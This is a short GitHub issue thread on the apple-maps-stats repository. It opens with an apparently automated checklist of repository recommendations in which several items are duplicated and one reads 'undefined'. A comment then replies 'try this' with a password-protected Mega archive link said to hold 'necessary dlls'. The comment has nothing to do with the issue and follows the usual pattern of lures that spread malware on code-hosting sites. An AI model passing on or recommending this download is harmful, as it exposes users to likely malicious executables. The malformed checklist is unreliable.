### ISSUE TITLE
[ZEON] - recommended additions

### ISSUE THREAD

**Issue by zeon-neon** [NeonGamerBot-QK/apple-maps-stats#1]
# Meta

- [ ] Github repo has no description [enable here](https://github.com/NeonGamerBot-QK/apple-maps-stats)

- [ ] This repo does not have discussions enabled

- [ ] This repo does not have a license

- [ ] This repo does not have a code of conduct (feature is in beta!)

- [ ] if possible make your app docker compatible? (beta)

- [ ] if possible make your app docker compatible? (beta)

- [ ] This repo does not have a license

- [ ] This repo does not have a code of conduct (feature is in beta!)

- [ ] undefined
# Automation

- [ ] **Mark this to override & close this issue.**

**Comment by SagarChandra07** [comment]
try this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme
I put the necessary dlls in the archive
